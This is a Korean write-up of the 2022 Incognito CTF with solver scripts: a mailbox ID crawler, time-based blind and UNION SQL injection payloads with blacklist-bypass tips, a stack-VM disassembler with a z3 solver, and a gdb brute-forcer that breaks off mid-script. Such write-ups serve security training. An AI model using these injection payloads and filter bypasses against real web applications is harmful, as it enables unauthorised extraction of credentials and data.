[2022 Incognito CTF] writeups 본문
1. crawl
import requests

# Walks the mailbox by incrementing an integer id and stops at the first
# reply that carries the flag marker.  Each request is built by hand
# (prepare_request + explicit headers) so the bytes on the wire mirror the
# page's own XHR; the Session keeps cookies between the two calls.
s = requests.Session()
counter = 1
while True:
    # GET the page first so the CSRF token can be scraped out of the inline
    # script: the token is whatever sits between the marker and the next
    # single quote.  If the marker is missing, find() returns -1 and the
    # slice starts at len(marker)-1, so a bogus token is sent rather than
    # an error raised.
    req = requests.Request('GET', 'http://ctf.incognito.kr:9000/ctf/mailbox')
    pre = s.prepare_request(req)
    resp = s.send(pre)
    csrf = resp.text[resp.text.find("{ \"X-CSRFToken\": '")+len("{ \"X-CSRFToken\": '"):]
    csrf = csrf[:csrf.find('\'')]
    # POST to mail_detail with browser-like headers copied from a real
    # request; only the token and the body change between iterations.
    req = requests.Request('POST', 'http://ctf.incognito.kr:9000/ctf/mailbox/mail_detail')
    pre = s.prepare_request(req)
    pre.headers['X-CSRFToken'] = csrf
    pre.headers['X-Requested-With'] = 'XMLHttpRequest'
    pre.headers['Referer'] = 'http://ctf.incognito.kr:9000/ctf/mailbox'
    pre.headers['Pragma'] = 'no-cache'
    pre.headers['Origin'] = 'http://ctf.incognito.kr:9000'
    pre.headers['Host'] = 'ctf.incognito.kr:9000'
    pre.headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
    pre.headers['Connection'] = 'keep-alive'
    pre.headers['Cache-Control'] = 'no-cache'
    pre.headers['Accept'] = 'application/json, text/javascript, */*; q=0.01'
    pre.headers['Accept-Encoding'] = 'gzip, deflate'
    pre.headers['Accept-Language'] = 'ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7'
    pre.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36'
    # The body is attached after prepare_request() ran, so Content-Length is
    # set by hand to match it; presumably the header computed at prepare
    # time would otherwise describe an empty body.
    pre.headers['Content-Length'] = str(len(f'"{counter}_show"'))
    # Body is the quoted "<id>_show" string; only the numeric id varies.
    pre.body = f'"{counter}_show"'
    resp = s.send(pre)
    print(resp.text)
    # Done when the flag prefix appears and the third-to-last character is
    # the closing brace (the reply presumably wraps the flag in two trailing
    # characters — confirm against a real response).
    if 'INCO{' in resp.text and resp.text[len(resp.text)-1-2] == '}':
        print('got it!!')
        break
    # No upper bound on the id: if the flag never shows up this runs forever.
    counter += 1
#INCO{It_1s_F1Ag_tHank_yOu3}
2. login
web 문제 중 blacklist filter 가 있는 경우, 대문자를 끼워넣거나 %0a 를 사용하는 방식으로 우회할 수 있다.
그리고 table, column 의 이름은 information_schema, sqlite 의 경우 sqlite_master 에서 알 수 있다.
import requests
import time
#table: member ADMINISTRABLE_ROLE_AUTHO)IZATIO7S INNODB_TABLESPACES
#member
#column: name pw num

# Timing side channel: the response body is never read, only how long the
# request took.  The cut-off is 2 s against a 3 s sleep, so a slow network
# round-trip above 2 s registers as a false "hit" — presumably acceptable
# for the CTF box, but worth a retry on flaky links.
# Step 1: find length(pw).  The loop leaves at the first counter for which
# `length(pw) < counter` holds, i.e. len+1, and the decrement brings it
# back to len.
counter = 0
while True:
    start_time = time.time()
    req = requests.get(f'http://ctf.incognito.kr:58888/index.php?id=%27|if((Select%0aLeNgth(pw)<{counter}%0afrom%0amember),sleep(3),0)=%271&pw=asdf')
    end_time = time.time()
    #print(end_time - start_time)
    if end_time - start_time > 2:
        counter -= 1
        break
    counter += 1
_len = counter
print(_len)
# Step 2: recover pw one character at a time, trying ASCII codes from 33
# ('!') upwards until the equality test delays the reply.  A character
# below 33 (e.g. a space) would never match and the inner loop would not
# terminate.
_name = ''
for i in range(_len):
    counter = 33
    while True:
        start_time = time.time()
        req = requests.get(f'http://ctf.incognito.kr:58888/index.php?id=%27|if((Select%0aaScii(suBsTring(pw,{i+1},1))={counter}%0afrom%0amember),sleep(3),0)=%271&pw=asdf')
        end_time = time.time()
        #print(end_time - start_time)
        if end_time - start_time > 2:
            #counter -= 1
            _name += chr(counter)
            print('Hit!, ', _name)
            break
        counter += 1
print(_name)
#VAPB{U3110!o1vaq_4qz1a!!} -> rot13 13 ->
#INCO{H3110!b1ind_4dm1n!!}
3. admin
여기는 select 의 사용이 불가능하기에 column 의 이름을 추측해야 하고,
time based sql injection 으로 YWRtaW5z (admins) 계정의 학번을 알아내야 한다.
그 계정으로 "비밀번호 찾기" 를 누르면, flag 의 base64 값이 나온다.
import requests
import time
import string

# Recovers a numeric field one digit at a time through the same timing
# channel as the previous script: `num like '<prefix><digit>%'` delays the
# reply by 3 s when the prefix matches, and a round-trip over 2 s counts as
# a hit.  The f-prefix on the URL is unused — the prefix and digit are
# concatenated with `+` instead.
num = ''
counter = 1
while True:
    bFound = False
    for i in string.digits:
        start_time = time.time()
        req = requests.get(f'http://ctf.incognito.kr:48888/index.php?name=asdf%5C&num=%0aor%0aif(name%0alike%0a\'YWRtaW5z\'%0aand%0anum%0alike%0a\''+num+i+'%25\',sleep(3),False)%0aor%0a%27')
        end_time = time.time()
        print(end_time - start_time)
        if end_time - start_time > 2:
            num += i
            print('Hit!, ', num)
            bFound = True
            break
    # No digit extends the prefix: the full value has been read.
    if not bFound:
        break
    # counter is incremented but never read.
    counter += 1
print(num)
#YWRtaW5z 19383746 -> SU5DT3tCNDUzNjRfMTVfNW9fMzQ1eSEhIX0= -> INCO{B45364_15_5o_345y!!!}
4. chatting
여러 테이블 중 auth_user 의 first_name 을 보면 flag 를 얻을 수 있다.
CREATE TABLE "django_migrations" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "app" varchar(255) NOT NULL, "name" varchar(255) NOT NULL, "applied" datetime NOT NULL)
CREATE TABLE sqlite_sequence(name,seq)
CREATE TABLE "auth_group_permissions" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "group_id" integer NOT NULL REFERENCES "auth_group" ("id") DEFERRABLE INITIALLY DEFERRED, "permission_id" integer NOT NULL REFERENCES "auth_permission" ("id") DEFERRABLE INITIALLY DEFERRED)
CREATE TABLE "auth_user_groups" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "user_id" integer NOT NULL REFERENCES "auth_user" ("id") DEFERRABLE INITIALLY DEFERRED, "group_id" integer NOT NULL REFERENCES "auth_group" ("id") DEFERRABLE INITIALLY DEFERRED)
CREATE TABLE "auth_user_user_permissions" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "user_id" integer NOT NULL REFERENCES "auth_user" ("id") DEFERRABLE INITIALLY DEFERRED, "permission_id" integer NOT NULL REFERENCES "auth_permission" ("id") DEFERRABLE INITIALLY DEFERRED)
CREATE UNIQUE INDEX "auth_group_permissions_group_id_permission_id_0cd325b0_uniq" ON "auth_group_permissions" ("group_id", "permission_id")
CREATE INDEX "auth_group_permissions_group_id_b120cbf9" ON "auth_group_permissions" ("group_id")
CREATE INDEX "auth_group_permissions_permission_id_84c5c92e" ON "auth_group_permissions" ("permission_id")
CREATE UNIQUE INDEX "auth_user_groups_user_id_group_id_94350c0c_uniq" ON "auth_user_groups" ("user_id", "group_id")
CREATE INDEX "auth_user_groups_user_id_6a12ed8b" ON "auth_user_groups" ("user_id")
CREATE INDEX "auth_user_groups_group_id_97559544" ON "auth_user_groups" ("group_id")
CREATE TABLE "django_admin_log" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "object_id" text NULL, "object_repr" varchar(200) NOT NULL, "action_flag" smallint unsigned NOT NULL CHECK ("action_flag" >= 0), "change_message" text NOT NULL, "content_type_id" integer NULL REFERENCES "django_content_type" ("id") DEFERRABLE INITIALLY DEFERRED, "user_id" integer NOT NULL REFERENCES "auth_user" ("id") DEFERRABLE INITIALLY DEFERRED, "action_time" datetime NOT NULL)
...
import requests

# Single request; the f-prefix is unnecessary (no placeholders) but harmless.
req = requests.get(f'http://ctf.incognito.kr:8877/?search=%27%20union%20select%20first_name,%20first_name%20from%20auth_user--%20')
# Cut the flag out of the page: from the first 'INCO{' through the first
# '}' after it.  If the marker is absent find() gives -1 and the slice
# starts at the last character; if '}' is absent the result is ''.
flag = req.text[req.text.find('INCO{'):]
flag = flag[:flag.find('}')+1]
print(flag)
#INCO{5ql_1NjEc71on}
5. DoNotDebug
IsDebuggerPresent 와 같은 안티 디버깅 기법들을 제거하는 패치를 해주면 손쉽게 flag 를 얻을 수 있다.
6. Stack Machine
vm 파일의 instruction 을 해석하고 난 후, z3 로 풀면 끝.
from pwn import *
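with open('vm', 'rb') as f:
    # One read of the whole image replaces the original 1024-byte chunk
    # loop; the resulting bytes object is the same.
    vm_raw = f.read()


def _u16(buf):
    """Decode the first two bytes of *buf* as a little-endian unsigned int."""
    return int.from_bytes(buf[:2], 'little')


def _u64(buf):
    """Decode the first eight bytes of *buf* as a little-endian unsigned int.

    Unlike pwntools' u64 this does not insist on exactly eight bytes, so a
    truncated operand at the end of the image decodes instead of raising.
    """
    return int.from_bytes(buf[:8], 'little')


# Image layout as consumed here: a 16-bit length prefix followed by that
# many bytes of bytecode.  Opcodes are single bytes; 41 and 213 are
# followed by an 8-byte immediate.
vm_len = _u16(vm_raw[:2])
vm = vm_raw[2:vm_len+2]
# j is the index of the current stack top.  The listing is printed as
# pseudo-code over an array c[] so it can be pasted into a solver script;
# the first line records the initial value of j.
print('j == -1')
j = -1
i = 0
while i < vm_len:
    content = vm[i]
    i += 1
    if content == 219:
        # read one input byte onto the stack
        j += 1
        print(f'c[{j}] = getchar()')
    elif content == 213:
        # conditional relative jump; pops the condition.
        # NOTE(review): i is advanced past the 8-byte operand *before* the
        # operand is decoded, so the printed offset comes from the eight
        # bytes that follow it (compare opcode 41 below, which decodes
        # first).  Kept as the author had it — confirm against the VM's
        # encoding before relying on the printed value.
        i += 8
        print(f'c[{j}] != 0 then i += 8+{_u64(vm[i:i+8])}')
        j -= 1
    elif content == 202:
        # xor the top two cells, result replaces them
        print(f'c[{j-1}] ^= c[{j}]')
        j -= 1
    elif content == 184:
        # add the top two cells, result replaces them
        print(f'c[{j-1}] += c[{j}]')
        j -= 1
    elif content == 161:
        # halt: the listing ends here and so does this script
        print(f'exit({_u64(vm[i:i+8])})')
        raise SystemExit
    elif content == 54:
        # output the top cell and pop it
        print(f'putchar(c[{j}])')
        j -= 1
    elif content == 41:
        # push an 8-byte immediate
        j += 1
        print(f'c[{j}] = {_u64(vm[i:i+8])}')
        i += 8
    elif content == 48:
        # not-equal compare of the top two cells, result replaces them
        print(f'c[{j-1}] = (c[{j}] != c[{j-1}])')
        j -= 1
    else:
        # an explicit raise survives `python -O`, unlike `assert False`
        raise AssertionError(f'unknown opcode {content} at offset {i-1}')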
from z3 import *

# Symbolic replay of the listing the disassembler printed: every getchar()
# becomes an 8-bit unknown, the arithmetic is replayed on a list standing in
# for the VM stack, and the final stack cells are pinned to the constants
# the VM compared them against.
inp = []
c = [0 for i in range(100)]
s = Solver()


def getchar():
    # One fresh 8-bit symbol per input byte, recorded in `inp` in read
    # order so the model can later be printed back as a string.
    tmp = BitVec('inp[%d]'%len(inp), 8)
    inp.append(tmp)
    return tmp


# NOTE(review): the constants below are 64-bit values while the symbols are
# 8 bits wide; when a Python int meets a BitVec, z3 casts the int to the
# BitVec's sort, so from the first `c[4] += c[5]` onward every affected
# cell is presumably computed mod 2^8 — confirm if the solved string looks
# wrong.  Each group below mirrors one stretch of the listing: push
# constants, read one input byte, fold the stack back down with +=/^=.
c[0] = 9932684790403988281
c[1] = 3981783414261391299
c[2] = 18128899290963801448
c[3] = 7499717806347970135
c[4] = 5425025371572045960
c[5] = getchar()
c[4] += c[5]
c[3] ^= c[4]
c[2] ^= c[3]
c[1] += c[2]
c[0] ^= c[1]
c[1] = 6326606491199503735
c[2] = 11727609654421141602
c[3] = 13333360695465845293
c[4] = 15936386119677961440
c[5] = getchar()
c[4] += c[5]
c[3] ^= c[4]
c[2] ^= c[3]
c[1] ^= c[2]
c[2] = 13013207156595470061
c[3] = 1444156656146803533
c[4] = 6835624496029438678
c[5] = getchar()
c[4] ^= c[5]
c[3] += c[4]
c[2] ^= c[3]
c[3] = 9473197671008895425
c[4] = 16390026795440292412
c[5] = 8618855848416941065
c[6] = getchar()
c[5] += c[6]
c[4] ^= c[5]
c[3] += c[4]
c[4] = 6024961974338290886
c[5] = 8810359034158194075
c[6] = 14469683107865870911
c[7] = 16039933917641716108
c[8] = 12640120913447022199
c[9] = getchar()
c[8] ^= c[9]
c[7] += c[8]
c[6] += c[7]
c[5] ^= c[6]
c[4] += c[5]
c[5] = 5193290494856744947
c[6] = 10690958200367824705
c[7] = 4868948814662615861
c[8] = 683964415960939350
c[9] = 4163681683479634048
c[10] = 12168753866435275347
c[11] = 12146127191315940638
c[12] = getchar()
c[11] ^= c[12]
c[10] += c[11]
c[9] ^= c[10]
c[8] ^= c[9]
c[7] += c[8]
c[6] += c[7]
c[5] += c[6]
c[6] = 3476564392780481757
c[7] = 2006874671871151415
c[8] = 12824197427929327444
c[9] = 12083025626049681937
c[10] = 16008583071417006553
c[11] = 3503452712029565141
c[12] = 4687048395109227849
c[13] = 16854047988139109216
c[14] = 13756878276426990950
c[15] = getchar()
c[14] ^= c[15]
c[13] ^= c[14]
c[12] ^= c[13]
c[11] ^= c[12]
c[10] += c[11]
c[9] += c[10]
c[8] ^= c[9]
c[7] ^= c[8]
c[6] += c[7]
c[7] = 7028037281966016268
c[8] = 14165122113651211877
c[9] = 5392392772250547940
c[10] = 3311842680646068432
c[11] = getchar()
c[10] ^= c[11]
c[9] += c[10]
c[8] += c[9]
c[7] += c[8]
c[8] = 9258641333616248163
c[9] = 13646422201855178699
c[10] = 17244770065079177130
c[11] = getchar()
c[10] += c[11]
c[9] += c[10]
c[8] += c[9]
c[9] = 11263758573414315722
c[10] = 2291098985055159465
c[11] = 17736300515739104956
c[12] = 9225658490194612832
c[13] = getchar()
c[12] += c[13]
c[11] += c[12]
c[10] += c[11]
c[9] ^= c[10]
c[10] = 10725323274089116828
c[11] = 6647285194965883625
c[12] = 10033362048030486878
c[13] = 8536304132617548188
c[14] = 6486727104292397225
c[15] = getchar()
c[14] += c[15]
c[13] ^= c[14]
c[12] += c[13]
c[11] += c[12]
c[10] ^= c[11]
c[11] = 10031450704042083898
c[12] = 15064108163919261094
c[13] = 6566164850047027542
c[14] = 3579091316087062654
c[15] = getchar()
c[14] += c[15]
c[13] ^= c[14]
c[12] ^= c[13]
c[11] += c[12]
c[12] = 698354924443006014
c[13] = 15280877972506416330
c[14] = 15577458196294027228
c[15] = getchar()
c[14] += c[15]
c[13] += c[14]
c[12] += c[13]
c[13] = 2498670747640652309
c[14] = 9524402598716321551
c[15] = 18044044835724495664
c[16] = 6213568967391424121
c[17] = 3147938522393136546
c[18] = 1730165799852629577
c[19] = 6408097110053457446
c[20] = 6196815601815273338
c[21] = 270944429482767874
c[22] = getchar()
c[21] += c[22]
c[20] += c[21]
c[19] ^= c[20]
c[18] += c[19]
c[17] += c[18]
c[16] ^= c[17]
c[15] += c[16]
c[14] += c[15]
c[13] += c[14]
c[14] = 4918898107041287428
c[15] = 18175739274470711949
c[16] = 14421442322560697809
c[17] = getchar()
c[16] ^= c[17]
c[15] += c[16]
c[14] += c[15]
c[15] = 8018804925798494415
c[16] = 6710318530716452507
c[17] = 16126219073666357108
c[18] = 14081309027816664652
c[19] = 16733055164831549011
c[20] = 7157954037798845337
c[21] = getchar()
c[20] += c[21]
c[19] ^= c[20]
c[18] ^= c[19]
c[17] += c[18]
c[16] ^= c[17]
c[15] += c[16]
c[16] = 15503965566483097647
c[17] = 4996101922589672156
c[18] = 5833521358458912777
c[19] = 2723680459370559844
c[20] = 2328313581554868504
c[21] = 1357365813224912539
c[22] = 14696593702283082662
c[23] = getchar()
c[22] += c[23]
c[21] ^= c[22]
c[20] ^= c[21]
c[19] += c[20]
c[18] ^= c[19]
c[17] += c[18]
c[16] ^= c[17]
c[17] = 13718262097243472683
c[18] = 3323983633866858589
c[19] = 10119337698916987669
c[20] = 1136020430667426008
c[21] = getchar()
c[20] ^= c[21]
c[19] ^= c[20]
c[18] += c[19]
c[17] ^= c[18]
c[18] = 4498241019005291386
c[19] = 10430024839406056567
c[20] = 11081984034916842939
c[21] = 2377861015981010747
c[22] = 8140368618305448802
c[23] = 11818413254717561094
c[24] = 7064401558039292889
c[25] = 12505631402569488455
c[26] = getchar()
c[25] += c[26]
c[24] += c[25]
c[23] += c[24]
c[22] += c[23]
c[21] += c[22]
c[20] += c[21]
c[19] += c[20]
c[18] ^= c[19]
c[19] = 12426720606117189214
c[20] = 14972901593259487129
c[21] = 8543482851339982473
c[22] = getchar()
c[21] += c[22]
c[20] ^= c[21]
c[19] += c[20]
c[20] = 1629889153707539478
c[21] = 17341177077300957439
c[22] = 6078944653200992161
c[23] = 10566666523869213247
c[24] = 7263284840378083349
c[25] = 17584022320925044751
c[26] = 8692105150239555357
c[27] = 315833979318776616
c[28] = 6269493266600410358
c[29] = getchar()
c[28] ^= c[29]
c[27] ^= c[28]
c[26] += c[27]
c[25] ^= c[26]
c[24] += c[25]
c[23] ^= c[24]
c[22] += c[23]
c[21] ^= c[22]
c[20] += c[21]
c[21] = 1928151548783765996
c[22] = 9136913200161131206
c[23] = 9558448254955062399
c[24] = 9043200431716271294
c[25] = 7522359116772730195
c[26] = getchar()
c[25] ^= c[26]
c[24] += c[25]
c[23] ^= c[24]
c[22] ^= c[23]
c[21] += c[22]
c[22] = 9912258405660383033
c[23] = 6050409919930564764
c[24] = 772317344628148685
c[25] = 11746303378648469064
c[26] = getchar()
c[25] ^= c[26]
c[24] += c[25]
c[23] += c[24]
c[22] ^= c[23]
c[23] = 18139491710616570868
c[24] = 9346305025277215902
c[25] = 835069692985696380
c[26] = 1773732121093517278
c[27] = 105682633695814624
c[28] = 8210763851348992640
c[29] = 1113714189784085863
c[30] = 5476748382071574810
c[31] = getchar()
c[30] ^= c[31]
c[29] ^= c[30]
c[28] += c[29]
c[27] += c[28]
c[26] += c[27]
c[25] ^= c[26]
c[24] += c[25]
c[23] += c[24]
c[24] = 4433023941960474278
c[25] = 14112970271161702627
c[26] = 14453461473651973526
c[27] = 11710389551995994491
c[28] = getchar()
c[27] ^= c[28]
c[26] ^= c[27]
c[25] += c[26]
c[24] += c[25]
c[25] = 10631904080342836610
c[26] = 13189193739346557134
c[27] = 8869784457484967284
c[28] = 12194173170689449781
c[29] = getchar()
c[28] += c[29]
c[27] += c[28]
c[26] += c[27]
c[25] += c[26]
c[26] = 15915053349214019189
c[27] = 11521767751078383438
c[28] = 14533552431219244418
c[29] = 14300881089460759252
c[30] = 9040285580144197694
c[31] = 10257692247147470437
c[32] = 14192837257263753759
c[33] = 2735605769679131093
c[34] = getchar()
c[33] += c[34]
c[32] ^= c[33]
c[31] += c[32]
c[30] ^= c[31]
c[29] += c[30]
c[28] ^= c[29]
c[27] ^= c[28]
c[26] ^= c[27]
c[27] = 13646125251590784611
c[28] = 2350223036634077455
c[29] = 5333532857677095192
c[30] = getchar()
c[29] ^= c[30]
c[28] += c[29]
c[27] ^= c[28]
c[28] = 10718192012270129589
c[29] = 123785428779133261
c[30] = 1115427221566365663
c[31] = 13858125889399502454
c[32] = 15421756623045370081
c[33] = 10625431853482940446
c[34] = 2858922243027052087
c[35] = getchar()
c[34] += c[35]
c[33] ^= c[34]
c[32] ^= c[33]
c[31] += c[32]
c[30] ^= c[31]
c[29] += c[30]
c[28] ^= c[29]
c[29] = 4193907992175213577
c[30] = 170664819355138875
c[31] = 9846060713415560061
c[32] = 10008376725607836570
c[33] = 6500742485917708152
c[34] = 3703571390196563300
c[35] = getchar()
c[34] += c[35]
c[33] ^= c[34]
c[32] ^= c[33]
c[31] ^= c[32]
c[30] ^= c[31]
c[29] ^= c[30]
c[30] = 16068289189730100280
c[31] = 15983412130463586929
c[32] = 6101489928213793106
c[33] = 15632864178300331681
c[34] = 13550763660520404178
c[35] = 1631272113114106589
c[36] = 3288050860235592420
c[37] = 1790832365339697305
c[38] = 4237654194595834826
c[39] = getchar()
c[38] += c[39]
c[37] += c[38]
c[36] += c[37]
c[35] += c[36]
c[34] += c[35]
c[33] += c[34]
c[32] += c[33]
c[31] += c[32]
c[30] += c[31]
c[31] = 1399164207473144990
c[32] = 15677047834318502945
c[33] = 7507893918949420867
c[34] = 14174128410387719963
c[35] = 11736459515879490328
c[36] = 11055886264332921041
c[37] = 9004881701944248172
c[38] = 17459828991442561468
c[39] = 12657901952147185249
c[40] = getchar()
c[39] ^= c[40]
c[38] += c[39]
c[37] ^= c[38]
c[36] += c[37]
c[35] += c[36]
c[34] += c[35]
c[33] ^= c[34]
c[32] ^= c[33]
c[31] ^= c[32]
c[32] = 11542163322951764181
c[33] = 13556695670265251290
c[34] = 8896178454740675680
c[35] = 9714994894358830132
c[36] = 4415780584005132632
c[37] = 12574376580664805321
c[38] = 2705749237807390307
c[39] = getchar()
c[38] ^= c[39]
c[37] ^= c[38]
c[36] += c[37]
c[35] ^= c[36]
c[34] += c[35]
c[33] ^= c[34]
c[32] += c[33]
c[33] = 2062725140253809310
c[34] = 1545706997601201613
c[35] = 16466472025074215596
c[36] = 13910973756042749477
c[37] = getchar()
c[36] += c[37]
c[35] ^= c[36]
c[34] += c[35]
c[33] += c[34]
c[34] = 15313922134322430163
c[35] = 5554890310739120801
c[36] = 10023476581573828743
c[37] = 9119145857545001130
c[38] = 4054077477321909583
c[39] = 12407098630961990094
c[40] = getchar()
c[39] += c[40]
c[38] += c[39]
c[37] += c[38]
c[36] += c[37]
c[35] += c[36]
c[34] ^= c[35]
c[35] = 1350795824549080488
c[36] = 6009822791611617285
c[37] = 8119372895504244127
c[38] = 2251446627786121745
c[39] = getchar()
c[38] += c[39]
c[37] += c[38]
c[36] ^= c[37]
c[35] ^= c[36]
c[36] = 15362678556740064341
c[37] = 10316159694986214414
c[38] = 3591983768360169475
c[39] = 14938784382612384621
c[40] = 11339084893309025514
c[41] = 12205994744993947123
c[42] = 17433327879405071452
c[43] = 5816977475588028627
c[44] = 16136773507488350822
c[45] = getchar()
c[44] += c[45]
c[43] ^= c[44]
c[42] += c[43]
c[41] += c[42]
c[40] ^= c[41]
c[39] += c[40]
c[38] += c[39]
c[37] += c[38]
c[36] += c[37]
c[37] = 14016925425405076414
c[38] = 6267620817628946003
c[39] = 16430625412469031478
c[40] = 88182008894387362
c[41] = 8709429871187949033
c[42] = 10589748356343871522
c[43] = 5064334248483087925
c[44] = 7426804913387014566
c[45] = 10865171643927062589
c[46] = getchar()
c[45] += c[46]
c[44] += c[45]
c[43] ^= c[44]
c[42] ^= c[43]
c[41] ^= c[42]
c[40] ^= c[41]
c[39] += c[40]
c[38] += c[39]
c[37] ^= c[38]
c[38] = 16763221103862173059
c[39] = 13422886181026844195
c[40] = 1631568059986288660
c[41] = 5215276383434159904
c[42] = 599997451257354427
c[43] = 16090446934827825033
c[44] = 5698261134564167716
c[45] = 14703224673005718394
c[46] = 16483544490155560671
c[47] = getchar()
c[46] += c[47]
c[45] ^= c[46]
c[44] ^= c[45]
c[43] += c[44]
c[42] += c[43]
c[41] += c[42]
c[40] ^= c[41]
c[39] += c[40]
c[38] ^= c[39]
c[39] = 5514693649090898598
c[40] = 5675775170157984441
c[41] = 14125598251763666359
c[42] = 18170077620203995512
c[43] = 19592580633248516
c[44] = 13683458113123837196
c[45] = getchar()
c[44] ^= c[45]
c[43] ^= c[44]
c[42] += c[43]
c[41] ^= c[42]
c[40] ^= c[41]
c[39] ^= c[40]
c[40] = 3131572931438933272
c[41] = 10714943557282477766
c[42] = 5484270251250118157
c[43] = 7822281286051639469
c[44] = 217496263967125951
c[45] = 7383182598747815858
c[46] = getchar()
c[45] ^= c[46]
c[44] ^= c[45]
c[43] += c[44]
c[42] ^= c[43]
c[41] += c[42]
c[40] += c[41]
c[41] = 11073291388929666744
c[42] = 12556045251181411187
c[43] = 17202987169272959651
c[44] = 3498233194846432736
c[45] = 9811028171250343540
c[46] = 15447895449397085620
c[47] = getchar()
c[46] ^= c[47]
c[45] += c[46]
c[44] += c[45]
c[43] ^= c[44]
c[42] ^= c[43]
c[41] += c[42]
c[42] = 18311754622359156630
c[43] = 15594695003269406222
c[44] = 14863770709621722151
c[45] = 1995415076881473459
c[46] = 11624903732590886947
c[47] = getchar()
c[46] += c[47]
c[45] += c[46]
c[44] ^= c[45]
c[43] ^= c[44]
c[42] += c[43]
c[43] = 11997434615315793955
c[44] = 15206057853866387321
c[45] = 11758249108697471326
c[46] = 5159877175902714817
c[47] = 11990864672144733375
c[48] = 16654263466120501907
c[49] = getchar()
c[48] += c[49]
c[47] += c[48]
c[46] ^= c[47]
c[45] ^= c[46]
c[44] += c[45]
c[43] ^= c[44]
c[44] = 14901411196071314281
c[45] = 16947858051347698953
c[46] = 11966293193572801808
c[47] = getchar()
c[46] += c[47]
c[45] ^= c[46]
c[44] += c[45]
c[45] = 17205182659947320959
c[46] = 7134039153444132965
c[47] = 1106747787369745867
c[48] = 8187918296814335425
c[49] = 15956329184180189402
c[50] = 4384353541114149762
c[51] = 2675631644319678684
c[52] = 2847463810049019273
c[53] = 12182251566179445109
c[54] = getchar()
c[53] += c[54]
c[52] += c[53]
c[51] ^= c[52]
c[50] ^= c[51]
c[49] += c[50]
c[48] += c[49]
c[47] ^= c[48]
c[46] ^= c[47]
c[45] ^= c[46]
# j is assigned here but never used afterwards.
j = 0
# Expected final stack, listed from the top cell (c[45]) down to c[0];
# presumably the immediates of the VM's compare instructions, copied from
# the listing.
res = [11160101089126054161, 2012728469017988072, 11117105121394465975, 12198350148471122344, 7607965874239596224, 6793088470981622980,
       9191418319461399064, 15232517486787036234, 5261740622873570926, 2111042004194075722, 14858885011757777482, 17272697075264961523,
       6313158162450257254, 1588658321132036046, 8991448573755356202, 4497652325675240907, 6016728178720961850, 13453796986756982161,
       15547245991394917615, 5920391660159577516, 7991567300444707631, 7743736540782924899, 4781932715221502857, 9817029683742592938,
       4201915802787942712, 12177332710199634000, 7336213525980958596, 5652188919652622626, 1130153536024248183, 4759154887302418413,
       16866370082191875729, 622591556653593921, 12982067723104642403, 13109947019533898011, 5112040232137058942, 9739034644397517078,
       695619218990020835, 3256345453131500815, 11450650774804292870, 3932877630134846168, 9357541319859029781, 9237722673203544338,
       1756632871624628261, 14303295942802133775, 10460946694704824854, 11086382675458244744]
# Pin each final cell to its expected value: c[45] to res[0], ..., c[0] to
# res[45].  46 cells, 46 input symbols.
for i in range(45, -1, -1):
    s.add(c[i] == res[45-i])
# sat/unsat first, then the raw model, then the input bytes in read order
# with no trailing newline.
print(s.check())
md = s.model()
print(md)
for i in inp:
    print(chr(md[i].as_long()),end='')
#INCO{94a7d6671aab2c62db0760e639c5217781030e2f}
7. NAND
import gdb

# Runs inside gdb (`gdb -x`): brute-forces a 40-character input one
# position at a time by watching which breakpoint the program stops at.
# idx is the position being worked on, bf_idx the candidate index within
# the alphabet for that position.
idx = 0
bf_idx = 0
# Candidate alphabet, pasted from a gdb memory dump; the address labels
# are filtered out, leaving the 37 byte values.
charset_range = [int(i, 16) for i in '''0x555555401e20: 0x37 0x6e 0x6b 0x75 0x34 0x67 0x30 0x73
0x555555401e28: 0x62 0x39 0x31 0x6c 0x6f 0x38 0x5f 0x63
0x555555401e30: 0x76 0x69 0x6d 0x79 0x33 0x78 0x65 0x70
0x555555401e38: 0x72 0x68 0x66 0x36 0x7a 0x74 0x35 0x61
0x555555401e40: 0x64 0x32 0x77 0x71 0x6a'''.split() if '0x5555' not in i]
# 40 positions, all starting at the first alphabet byte, plus a NUL.
flag = [charset_range[0] for i in range(40)]
flag.append(0)
gdb.execute('file NAND')
# ASLR off so the 0x555555400000 base used below is stable across runs.
gdb.execute('aslr off')
# One address per flag position (40 entries); presumably the exit taken
# when the check for that position fails.
hell_list = [0xE31, 0xE8B, 0xEF4, 0xF61, 0xFD3, 0x101E, 0x1087, 0x10F4, 0x1157, 0x11C0, 0x121A, 0x1296, 0x1308, 0x1371, 0x13BC, 0x141A, 0x147D, 0x14C8, 0x1531, 0x158F, 0x15F2, 0x164C, 0x16B5, 0x1722, 0x1785, 0x17DF, 0x1857, 0x18B5, 0x1927, 0x1990, 0x19DB, 0x1A2A, 0x1A8D, 0x1AD8, 0x1B41, 0x1B90, 0x1BE4, 0x1C20, 0x1C6B, 0x1CD8]
for i in range(len(hell_list)):
    hell_list[i] += 0x555555400000
    gdb.execute(f'b *{hex(hell_list[i])}')
# Address reached once every position has passed.
goal = 0x1CF7+0x555555400000
# Three further fixed breakpoints; what they mark is not visible here.  The
# loop below relies on the first stop after `r` being one of them.
gdb.execute('b *0xD51+0x555555400000')
gdb.execute('b *0xDBE+0x555555400000')
gdb.execute(f'b *{hex(goal)}')
gdb.execute('b *0xCA5+0x555555400000')
while True:
    # Fresh run each iteration with a throwaway stdin, step once past the
    # first stop, then overwrite the input buffer at $rbp-0x60 with the
    # current candidate (presumably right after the program read it).
    gdb.execute('r <<< \'A\'')
    gdb.execute('ni')
    for i in range(len(flag)):
        gdb.execute(f'set *((char*)$rbp-0x60+{i})={hex(flag[i])}')
    gdb.execute('c')
    # `x/xg $rip` prints "<addr>:\t<value>"; keep the address.
    present_bp = int(gdb.execute('x/xg $rip', to_string=True).split(':\t')[0], 16)
    print(hex(present_bp), hex(hell_list[idx]))
    if present_bp == hell_list[idx]:
        # Current position rejected: move to the next alphabet byte.
        # bf_idx is not bounded, so an unmatched position ends in an
        # IndexError once the 37 candidates are exhausted.
        bf_idx += 1
        flag[idx] = charset_range[bf_idx]
        print(idx, flag[idx])
    elif present_bp in hell_list[idx+1:]:
        # Stopped at a later position's breakpoint: this one is accepted.
